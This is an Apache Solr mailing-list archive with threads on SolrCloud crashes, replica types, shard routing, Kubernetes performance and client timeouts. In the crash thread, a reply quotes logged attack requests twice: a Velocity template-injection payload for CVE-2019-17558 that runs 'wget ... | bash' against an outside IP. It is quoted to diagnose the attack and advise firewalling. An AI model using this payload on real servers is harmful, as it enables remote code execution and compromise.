Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document rather:

https://www.tenable.com/cve/CVE-2019-17558 



On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's 
Solr node has been running for 4 weeks so far.  I think this security hole 
doesn't just leak the information but it can also kill the Solr process.


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's Solr 
node has been running for 4 weeks so far.  I think this security hole doesn't 
just leak the information but it can also kill the Solr process.


TK




Re: SolrCloud keeps crashing

2021-02-01 Thread Satish Silveri
I am facing the same issue. Did u find any solution for this?




--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


How to change the JVM Threads of SolrCloud

2021-01-21 Thread Issei Nishigata
Hello All,

I'm running SolrCloud(1 shard,9 replicas) on Amazon EKS.

The other day, when I accidentally stopped CoreDNS of EKS,
the entire Solr cluster went down due to the inability to resolve names of
each node.
I restarted CoreDNS shortly afterwards, but the Solr node just repeated
down and recovering,
and it did not return to the normal state automatically.

During this time Solr was in a state of accepting search requests all the
time,
so I stopped the search request completely.
After that, I executed DELETEREPLICA to reduce the number of Solr nodes to
one.
I increased the number of replicas little by little, and after returning to
the original cluster state completely,
I restarted the search request, and after that, no particular problem
occurred.

At the time of this failure, the JVM Threads on each node were stuck at
1.
Since the load was very high, it is probable that each node repeated down
and recovering.
If I reduced(or increased) this JVM Threads, would the Solr cluster
automatically return to normal state?
If so, what setting in sorlconfig.xml should I change to reduce(or
increase) this JVM Threads?
I think "maxConnectionsPerHost" and "maximumPoolSize" are related to this
issue,
but I'm not sure about the difference between the two.

Any help would be appreciated.

Thanks, Issei


Re: Solrcloud - Reads on specific nodes

2021-01-18 Thread Shawn Heisey

On 1/17/2021 11:12 PM, Doss wrote:

Thanks Michael Gibney , Shawn Heisey for pointing in the right direction.

1. Will there be any performance degrade if we use shards.preference?
2. How about leader election if we decided to use NRT + PULL ? TLOG has the
advantage of participating in leader election correct?
3. NRT + TLOG is there any parameter which can reduce the TLOG replication
time


I have no idea what kind of performance degradation you might expect 
from using shards.preference.  I wouldn't expect any, but I do not know 
enough details about your environment to comment.


A TLOG replica that is elected leader functions exactly like NRT.  TLOG 
replicas that are not leaders replicate the transaction log, which makes 
them capable of becoming leader.


PULL and TLOG non-leaders do not index.  They use the old replication 
feature, copying exact segment data from the leader.


If you want SolrCloud to emulate the old master/slave paradigm, my 
recommendation would be to create two TLOG replicas per shard and make 
the rest PULL.  Then use shards.preference on queries to prefer PULL 
replicas.  The PULL replicas can never become leader, so you can be sure 
that they will never do any indexing.


Thanks,
Shawn


Re: Solrcloud - Reads on specific nodes

2021-01-17 Thread Doss
Thanks Michael Gibney , Shawn Heisey for pointing in the right direction.

1. Will there be any performance degrade if we use shards.preference?
2. How about leader election if we decided to use NRT + PULL ? TLOG has the
advantage of participating in leader election correct?
3. NRT + TLOG is there any parameter which can reduce the TLOG replication
time

Have a greate week ahead!

Regards,
Mohandoss.

On Fri, Jan 15, 2021 at 9:20 PM Shawn Heisey  wrote:

> On 1/15/2021 7:56 AM, Doss wrote:
> > 1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
> > nodes for writes and 6 nodes for selects?
> >
> > 2. We have a SOLR cloud setup for our customer facing applications, and
> we
> > would like to have two more SOLR nodes for some backend jobs. Is it good
> > idea to form these nodes as slave nodes and making one node in the cloud
> as
> > Master?
>
> SolrCloud does not have masters or slaves.
>
> One thing you could do is set the replica types on four of those nodes
> to one type, and on the other nodes, use a different replica type.  For
> instance, the four nodes could be TLOG and the six nodes could be PULL.
>
> Then you can use the shards.preference parameter on your queries to only
> query the type of replica that you want.
>
>
> https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter
>
> Thanks,
> Shawn
>


Re: Solrcloud - Reads on specific nodes

2021-01-15 Thread Shawn Heisey

On 1/15/2021 7:56 AM, Doss wrote:

1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
nodes for writes and 6 nodes for selects?

2. We have a SOLR cloud setup for our customer facing applications, and we
would like to have two more SOLR nodes for some backend jobs. Is it good
idea to form these nodes as slave nodes and making one node in the cloud as
Master?


SolrCloud does not have masters or slaves.

One thing you could do is set the replica types on four of those nodes 
to one type, and on the other nodes, use a different replica type.  For 
instance, the four nodes could be TLOG and the six nodes could be PULL.


Then you can use the shards.preference parameter on your queries to only 
query the type of replica that you want.


https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter

Thanks,
Shawn


Re: Solrcloud - Reads on specific nodes

2021-01-15 Thread Michael Gibney
I know you're asking about nodes, not replicas; but depending on what
you're trying to achieve you might be as well off routing requests based on
replica. Have you considered the various options available via the
`shards.preference` param [1]? For instance, you could set up your "write"
replicas as `NRT`, and your "read" replicas as `PULL`, then use the
`replica.type` property of the `shards.preference` param to route "select"
requests to the `PULL` replicas.

It might also be worth looking at the options for stable routing provided
by the relatively new `replica.base` property (of `shards.preference`
param). If you have varying workloads with distinct cache usage patterns,
for instance, this could be useful to you.

To tie this back to nodes (your original question, if a replica-focused
solution is not sufficient): you could still use replica types and the
`shards.preference` param to control request routing, and implicitly route
by node by paying extra attention to careful replica placement on
particular nodes. As it happens, I'm actually doing a very simple variant
of this -- but not in a general-purpose enough way to feel I'm in a
position to make any specific recommendations.

[1]
https://lucene.apache.org/solr/guide/8_7/distributed-requests.html#shards-preference-parameter

On Fri, Jan 15, 2021 at 9:56 AM Doss  wrote:

> Dear All,
>
> 1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
> nodes for writes and 6 nodes for selects?
>
> 2. We have a SOLR cloud setup for our customer facing applications, and we
> would like to have two more SOLR nodes for some backend jobs. Is it good
> idea to form these nodes as slave nodes and making one node in the cloud as
> Master?
>
> Thanks!
> Mohandoss.
>


Re: Replicaton SolrCloud

2021-01-15 Thread Shawn Heisey

On 1/15/2021 7:20 AM, Jae Joo wrote:

Is non CDCR replication in SolrCloud still working in Solr 9.0?


Solr 9 doesn't exist yet.  Probably won't for at least a few months. 
The latest version is 8.7.0.


Solr's replication feature is used by SolrCloud internally for recovery 
operations, but the user doesn't configure it at all.  SolrCloud uses 
its own mechanisms to replicate indexes.  I doubt that those mechanisms 
will disappear when version 9.0 comes out.


Thanks,
Shawn


Solrcloud - Reads on specific nodes

2021-01-15 Thread Doss
Dear All,

1. Suppose we have 10 node SOLR Cloud setup, is it possible to dedicate 4
nodes for writes and 6 nodes for selects?

2. We have a SOLR cloud setup for our customer facing applications, and we
would like to have two more SOLR nodes for some backend jobs. Is it good
idea to form these nodes as slave nodes and making one node in the cloud as
Master?

Thanks!
Mohandoss.


Replicaton SolrCloud

2021-01-15 Thread Jae Joo
Is non CDCR replication in SolrCloud still working in Solr 9.0?

Jae


SolrCloud 8.7.0 with Zookeeper 3.4.5

2021-01-15 Thread Subhajit Das

Hi There,

I am planning to implement Solr cloud 8.7.0 with existing Zookeeper 3.4.5. This 
is cloudera provided zookeeper.

Is there any red flags, for such configuration, as I couldn’t find any 
compatibility matrix?

Many thanks in advance.

Regards,
Subhajit


Re: solrcloud with EKS kubernetes

2021-01-14 Thread Abhishek Mishra
Hi Jonathan,
it was really helpful. Some of the metrics were crossing threshold like
network bandwidth etc.

Regards,
Abhishek

On Sat, Dec 26, 2020 at 7:54 PM Jonathan Tan  wrote:

> Hi Abhishek,
>
> Merry Christmas to you too!
> I think it's really a question regarding your indexing speed NFRs.
>
> Have you had a chance to take a look at your IOPS & write bytes/second
> graphs for that host & PVC?
>
> I'd suggest that's the first thing to go look at, so that you can find out
> whether you're actually IOPS bound or not.
> If you are, then it becomes a question of *how* you're indexing, and
> whether that can be "slowed down" or not.
>
>
>
> On Thu, Dec 24, 2020 at 5:55 PM Abhishek Mishra 
> wrote:
>
> > Hi Jonathan,
> > Merry Christmas.
> > Thanks for the suggestion. To manage IOPS can we do something on
> > rate-limiting behalf?
> >
> > Regards,
> > Abhishek
> >
> >
> > On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:
> >
> > > Hi Abhishek,
> > >
> > > We're running Solr Cloud 8.6 on GKE.
> > > 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> > > configured, all with anti-affinity so they never exist on the same
> node.
> > > It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> > > disk usage on each node is ~54gb (we've got all the shards replicated
> to
> > > all nodes)
> > >
> > > We're also using a 200gb zonal SSD, which *has* been necessary just so
> > that
> > > we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS
> for
> > > read & write each, and 96MB/s for read & write each)
> > >
> > > Various lessons learnt...
> > > You definitely don't want them ever on the same kubernetes node. From a
> > > resilience perspective, yes, but also when one SOLR node gets busy,
> they
> > > tend to all get busy, so now you'll have resource contention. Recovery
> > can
> > > also get very busy and resource intensive, and again, sitting on the
> same
> > > node is problematic. We also saw the need to move to SSDs because of
> how
> > > IOPS bound we were.
> > >
> > > Did I mention use SSDs? ;)
> > >
> > > Good luck!
> > >
> > > On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> > > wrote:
> > >
> > > > Hi Houston,
> > > > Sorry for the late reply. Each shard has a 9GB size around.
> > > > Yeah, we are providing enough resources to pods. We are currently
> > > > using c5.4xlarge.
> > > > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > > > No, I haven't run it outside Kubernetes. But I do have colleagues who
> > did
> > > > the same on 7.2 and didn't face any issue regarding it.
> > > > Storage volume is gp2 50GB.
> > > > It's not the search query where we are facing inconsistencies or
> > > timeouts.
> > > > Seems some internal admin APIs sometimes have issues. So while adding
> > new
> > > > replica in clusters sometimes result in inconsistencies. Like
> recovery
> > > > takes some time more than one hour.
> > > >
> > > > Regards,
> > > > Abhishek
> > > >
> > > > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman <
> > houstonput...@gmail.com
> > > >
> > > > wrote:
> > > >
> > > > > Hello Abhishek,
> > > > >
> > > > > It's really hard to provide any advice without knowing any
> > information
> > > > > about your setup/usage.
> > > > >
> > > > > Are you giving your Solr pods enough resources on EKS?
> > > > > Have you run Solr in the same configuration outside of kubernetes
> in
> > > the
> > > > > past without timeouts?
> > > > > What type of storage volumes are you using to store your data?
> > > > > Are you using headless services to connect your Solr Nodes, or
> > > ingresses?
> > > > >
> > > > > If this is the first time that you are using this data + Solr
> > > > > configuration, maybe it's just that your data within Solr isn't
> > > optimized
> > > > > for the type of queries that you are doing.
> > > > > If you have run it successfully in the past outside of Kubernetes,
> > > then I
> > > > > would look at the resources that you are giving your pods and the
> > > storage
> > > > > volumes that you are using.
> > > > > If you are using Ingresses, that might be causing slow connections
> > > > between
> > > > > nodes, or between your client and Solr.
> > > > >
> > > > > - Houston
> > > > >
> > > > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra <
> solrmis...@gmail.com
> > >
> > > > > wrote:
> > > > >
> > > > > > Hello guys,
> > > > > > We are kind of facing some of the issues(Like timeout etc.) which
> > are
> > > > > very
> > > > > > inconsistent. By any chance can it be related to EKS? We are
> using
> > > solr
> > > > > 7.7
> > > > > > and zookeeper 3.4.13. Should we move to ECS?
> > > > > >
> > > > > > Regards,
> > > > > > Abhishek
> > > > > >
> > > > >
> > > >
> > >
> >
>


What should I do when I see a collection "recovering" in SolrCloud?

2021-01-13 Thread ufuk yılmaz
Should I stop indexing new documents, or stop indexing and wait for collections 
to recover?

Recently our disk got 100% full and Solr started to throw various errors. So I 
deleted some unnecessary documents and committed with expungeDeletes=true. It 
freed some space but many collections went into recovery mode.

Is there a guideline on how to react to such situations?

Thanks!

Sent from Mail for Windows 10



Re: Solrcloud load balancing / failover

2020-12-26 Thread Dominique Bejean
Hi,
Thank you for your response.
Dominique

Le mar. 15 déc. 2020 à 08:06, Shalin Shekhar Mangar 
a écrit :

> No, the load balancing is based on random selection of replicas and
> CPU is not consulted. There are limited ways to influence the replica
> selection, see
> https://lucene.apache.org/solr/guide/8_4/distributed-requests.html#shards-preference-parameter
>
> If a replica fails then the query fails and an error is returned. I
> think (but I am not sure) that SolrJ retries the request on some
> specific errors in which case a different replica may be selected and
> the request may succeed.
>
> IMO, these are two weak areas of Solr right now. Suggestions/patches
> are welcome :-)
>
> On 12/11/20, Dominique Bejean  wrote:
> > Hi,
> >
> > Is there in Solrcloud any load balancing based on CPU load on Solr nodes
> ?
> >
> > If for shard a replica fails to handle a query, the query is sent to
> > another replica in order to be completed ?
> >
> > Regards
> >
> > Dominique
> >
>
>
> --
> Regards,
> Shalin Shekhar Mangar.
>


Re: solrcloud with EKS kubernetes

2020-12-26 Thread Jonathan Tan
Hi Abhishek,

Merry Christmas to you too!
I think it's really a question regarding your indexing speed NFRs.

Have you had a chance to take a look at your IOPS & write bytes/second
graphs for that host & PVC?

I'd suggest that's the first thing to go look at, so that you can find out
whether you're actually IOPS bound or not.
If you are, then it becomes a question of *how* you're indexing, and
whether that can be "slowed down" or not.



On Thu, Dec 24, 2020 at 5:55 PM Abhishek Mishra 
wrote:

> Hi Jonathan,
> Merry Christmas.
> Thanks for the suggestion. To manage IOPS can we do something on
> rate-limiting behalf?
>
> Regards,
> Abhishek
>
>
> On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:
>
> > Hi Abhishek,
> >
> > We're running Solr Cloud 8.6 on GKE.
> > 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> > configured, all with anti-affinity so they never exist on the same node.
> > It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> > disk usage on each node is ~54gb (we've got all the shards replicated to
> > all nodes)
> >
> > We're also using a 200gb zonal SSD, which *has* been necessary just so
> that
> > we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
> > read & write each, and 96MB/s for read & write each)
> >
> > Various lessons learnt...
> > You definitely don't want them ever on the same kubernetes node. From a
> > resilience perspective, yes, but also when one SOLR node gets busy, they
> > tend to all get busy, so now you'll have resource contention. Recovery
> can
> > also get very busy and resource intensive, and again, sitting on the same
> > node is problematic. We also saw the need to move to SSDs because of how
> > IOPS bound we were.
> >
> > Did I mention use SSDs? ;)
> >
> > Good luck!
> >
> > On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> > wrote:
> >
> > > Hi Houston,
> > > Sorry for the late reply. Each shard has a 9GB size around.
> > > Yeah, we are providing enough resources to pods. We are currently
> > > using c5.4xlarge.
> > > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > > No, I haven't run it outside Kubernetes. But I do have colleagues who
> did
> > > the same on 7.2 and didn't face any issue regarding it.
> > > Storage volume is gp2 50GB.
> > > It's not the search query where we are facing inconsistencies or
> > timeouts.
> > > Seems some internal admin APIs sometimes have issues. So while adding
> new
> > > replica in clusters sometimes result in inconsistencies. Like recovery
> > > takes some time more than one hour.
> > >
> > > Regards,
> > > Abhishek
> > >
> > > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman <
> houstonput...@gmail.com
> > >
> > > wrote:
> > >
> > > > Hello Abhishek,
> > > >
> > > > It's really hard to provide any advice without knowing any
> information
> > > > about your setup/usage.
> > > >
> > > > Are you giving your Solr pods enough resources on EKS?
> > > > Have you run Solr in the same configuration outside of kubernetes in
> > the
> > > > past without timeouts?
> > > > What type of storage volumes are you using to store your data?
> > > > Are you using headless services to connect your Solr Nodes, or
> > ingresses?
> > > >
> > > > If this is the first time that you are using this data + Solr
> > > > configuration, maybe it's just that your data within Solr isn't
> > optimized
> > > > for the type of queries that you are doing.
> > > > If you have run it successfully in the past outside of Kubernetes,
> > then I
> > > > would look at the resources that you are giving your pods and the
> > storage
> > > > volumes that you are using.
> > > > If you are using Ingresses, that might be causing slow connections
> > > between
> > > > nodes, or between your client and Solr.
> > > >
> > > > - Houston
> > > >
> > > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra  >
> > > > wrote:
> > > >
> > > > > Hello guys,
> > > > > We are kind of facing some of the issues(Like timeout etc.) which
> are
> > > > very
> > > > > inconsistent. By any chance can it be related to EKS? We are using
> > solr
> > > > 7.7
> > > > > and zookeeper 3.4.13. Should we move to ECS?
> > > > >
> > > > > Regards,
> > > > > Abhishek
> > > > >
> > > >
> > >
> >
>


Re: solrcloud with EKS kubernetes

2020-12-23 Thread Abhishek Mishra
Hi Jonathan,
Merry Christmas.
Thanks for the suggestion. To manage IOPS can we do something on
rate-limiting behalf?

Regards,
Abhishek


On Thu, Dec 17, 2020 at 5:07 AM Jonathan Tan  wrote:

> Hi Abhishek,
>
> We're running Solr Cloud 8.6 on GKE.
> 3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
> configured, all with anti-affinity so they never exist on the same node.
> It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
> disk usage on each node is ~54gb (we've got all the shards replicated to
> all nodes)
>
> We're also using a 200gb zonal SSD, which *has* been necessary just so that
> we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
> read & write each, and 96MB/s for read & write each)
>
> Various lessons learnt...
> You definitely don't want them ever on the same kubernetes node. From a
> resilience perspective, yes, but also when one SOLR node gets busy, they
> tend to all get busy, so now you'll have resource contention. Recovery can
> also get very busy and resource intensive, and again, sitting on the same
> node is problematic. We also saw the need to move to SSDs because of how
> IOPS bound we were.
>
> Did I mention use SSDs? ;)
>
> Good luck!
>
> On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
> wrote:
>
> > Hi Houston,
> > Sorry for the late reply. Each shard has a 9GB size around.
> > Yeah, we are providing enough resources to pods. We are currently
> > using c5.4xlarge.
> > XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> > No, I haven't run it outside Kubernetes. But I do have colleagues who did
> > the same on 7.2 and didn't face any issue regarding it.
> > Storage volume is gp2 50GB.
> > It's not the search query where we are facing inconsistencies or
> timeouts.
> > Seems some internal admin APIs sometimes have issues. So while adding new
> > replica in clusters sometimes result in inconsistencies. Like recovery
> > takes some time more than one hour.
> >
> > Regards,
> > Abhishek
> >
> > On Thu, Dec 10, 2020 at 10:23 AM Houston Putman  >
> > wrote:
> >
> > > Hello Abhishek,
> > >
> > > It's really hard to provide any advice without knowing any information
> > > about your setup/usage.
> > >
> > > Are you giving your Solr pods enough resources on EKS?
> > > Have you run Solr in the same configuration outside of kubernetes in
> the
> > > past without timeouts?
> > > What type of storage volumes are you using to store your data?
> > > Are you using headless services to connect your Solr Nodes, or
> ingresses?
> > >
> > > If this is the first time that you are using this data + Solr
> > > configuration, maybe it's just that your data within Solr isn't
> optimized
> > > for the type of queries that you are doing.
> > > If you have run it successfully in the past outside of Kubernetes,
> then I
> > > would look at the resources that you are giving your pods and the
> storage
> > > volumes that you are using.
> > > If you are using Ingresses, that might be causing slow connections
> > between
> > > nodes, or between your client and Solr.
> > >
> > > - Houston
> > >
> > > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> > > wrote:
> > >
> > > > Hello guys,
> > > > We are kind of facing some of the issues(Like timeout etc.) which are
> > > very
> > > > inconsistent. By any chance can it be related to EKS? We are using
> solr
> > > 7.7
> > > > and zookeeper 3.4.13. Should we move to ECS?
> > > >
> > > > Regards,
> > > > Abhishek
> > > >
> > >
> >
>


SolrCloud keeps crashing

2020-12-21 Thread Victor Kretzer
My setup:
3 SolrCloud 6.6.6 nodes and 3 zookeeper 3.4.14 nodes running on 3 Azure Ubuntu 
18.04 LTS VMs (1 solr/1 zk per machine).

My issue:
Every few days (1-3 days usually) I come on to find 2 of me 3 nodes down. I'm 
looking at the logs and not seeing an out of memory error. I do see in the 
solr_gc.logs that the gc is running more and more frequently. I also see some 
illegal type errors in the solr logs. But I'm not sure what the actual cause of 
the crash is and my understanding of garbage collection is rudimentary, at best.
Is there an obvious cause in the logs that I'm not understanding or do I need 
to turn to some other resource to trouble these issues?

Below is part of my logs. I can include more if helpful but they are very long. 
(>10k lines for solr.log, >53k lines for the gc.log). Please let me know if 
there is any additional information I can provide and thank you in advance for 
your help.


***
solr.log
***
2020-12-20 08:49:02.802 ERROR (qtp401424608-8936) 
[c:sitecore_submittals_index_sec s:shard1 r:core_node1 
x:sitecore_submittals_index_sec_shard1_replica2] o.a.s.s.HttpSolrCall 
null:org.apache.velocity.exception.MethodInvocationException: Invocation of 
method 'toChars' in  class java.lang.Class threw exception 
java.lang.IllegalArgumentException at custom.vm[line 1, column 376]
at 
org.apache.velocity.runtime.parser.node.ASTMethod.handleInvocationException(ASTMethod.java:243)
at 
org.apache.velocity.runtime.parser.node.ASTMethod.execute(ASTMethod.java:187)
at 
org.apache.velocity.runtime.parser.node.ASTReference.execute(ASTReference.java:280)
at 
org.apache.velocity.runtime.parser.node.ASTReference.value(ASTReference.java:567)
at 
org.apache.velocity.runtime.parser.node.ASTMethod.execute(ASTMethod.java:151)
at 
org.apache.velocity.runtime.parser.node.ASTReference.execute(ASTReference.java:280)
at 
org.apache.velocity.runtime.parser.node.ASTReference.render(ASTReference.java:369)
at 
org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72)
at 
org.apache.velocity.runtime.directive.Foreach.render(Foreach.java:420)
at 
org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:207)
at 
org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:342)
at org.apache.velocity.Template.merge(Template.java:356)
at org.apache.velocity.Template.merge(Template.java:260)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:169)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:810)
at 
org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:539)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:361)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:305)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1691)
at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:582)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at 
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:548)
at 
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:226)
at 
org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1180)
at 
org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:512)
at 
org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185)
at 
org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1112)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
at 
org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:213)
at 
org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:119)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:134)
at 
org.eclipse.jetty.rewrite.handler.RewriteHandler.handle(RewriteHandler.java:335)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:134)
at org.eclipse.jetty.server.Server.handle(Server.java:534)
at 
org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.ja

Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi erick,

Thanks. Yes we will be upgrading soon to 8.8
till we upgrade we are increasing socket timeout and it helps for time
being to some extent.

regards,
kshitij

On Fri, Dec 18, 2020 at 7:48 PM Erick Erickson 
wrote:

> Right, there are several alternatives. Try going here:
> http://jirasearch.mikemccandless.com/search.py?index=jira
>
> and search for “circuit breaker” and you’ll find a bunch
> of JIRAs. Unfortunately, some are in 8.8..
>
> That said, some of the circuit breakers are in much earlier
> releases. Would it suffice until you can upgrade to set
> the circuit breakers?
>
> One problem with your solution is that the query keeps
> on running, admittedly on only one replica of each shard.
> With circuit breakers, the query itself is stoped, thus freeing
> up resources.
>
> Additionally, if you see a pattern (for instance, certain
> wildcard patterns) you could intercept that before sending.
>
> Best,
> Erick
>
> > On Dec 18, 2020, at 8:52 AM, kshitij tyagi 
> wrote:
> >
> > Hi Erick,
> >
> > I agree but in a huge cluster the retries keeps on happening, cant we
> have
> > this feature implemented in client.
> > i was referring to this jira
> > https://issues.apache.org/jira/browse/SOLR-10479
> > We have seen that some malicious queries come to system which takes
> > significant time and these queries propagating to other solr servers
> choke
> > the entire cluster.
> >
> > Regards,
> > kshitij
> >
> >
> >
> >
> >
> > On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
> > wrote:
> >
> >> Why do you want to do this? This sounds like an XY problem, you
> >> think you’re going to solve some problem X by doing Y. Y in this case
> >> is setting the numServersToTry, but you haven’t explained what X,
> >> the problem you’re trying to solve is.
> >>
> >> Offhand, this seems like a terrible idea. If you’re requests are timing
> >> out, what purpose is served by _not_ trying the next one on the
> >> list? With, of course, a much longer timeout interval…
> >>
> >> The code is structured that way on the theory that you want the request
> >> to succeed and the system needs to be tolerant of momentary
> >> glitches due to network congestion, reading indexes into memory, etc.
> >> Bypassing that assumption needs some justification….
> >>
> >> Best,
> >> Erick
> >>
> >>> On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
> >> wrote:
> >>>
> >>> Hi,
> >>>
> >>> We have a Solrcloud setup and are using CloudSolrClient, What we are
> >> seeing
> >>> is if socketTimeoutOccurs then the same request is sent to other solr
> >>> server.
> >>>
> >>> So if I set socketTimeout to a very low value say 100ms and my query
> >> takes
> >>> around 200ms then client tries to query second server, then next and so
> >>> on(basically all available servers with same query).
> >>>
> >>> I see that we have *numServersToTry* in LBSolrClient class but not able
> >> to
> >>> set this using CloudSolrClient. Using this we can restrict the above
> >>> feature.
> >>>
> >>> Should a jira be created to support numServersToTry by CloudSolrClient?
> >> Or
> >>> is there any other way to control the request to other solr servers?.
> >>>
> >>> Regards,
> >>> kshitij
> >>
> >>
>
>


Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread Erick Erickson
Right, there are several alternatives. Try going here:
http://jirasearch.mikemccandless.com/search.py?index=jira

and search for “circuit breaker” and you’ll find a bunch
of JIRAs. Unfortunately, some are in 8.8..

That said, some of the circuit breakers are in much earlier
releases. Would it suffice until you can upgrade to set
the circuit breakers?

One problem with your solution is that the query keeps
on running, admittedly on only one replica of each shard.
With circuit breakers, the query itself is stoped, thus freeing
up resources.

Additionally, if you see a pattern (for instance, certain
wildcard patterns) you could intercept that before sending.

Best,
Erick

> On Dec 18, 2020, at 8:52 AM, kshitij tyagi  wrote:
> 
> Hi Erick,
> 
> I agree but in a huge cluster the retries keeps on happening, cant we have
> this feature implemented in client.
> i was referring to this jira
> https://issues.apache.org/jira/browse/SOLR-10479
> We have seen that some malicious queries come to system which takes
> significant time and these queries propagating to other solr servers choke
> the entire cluster.
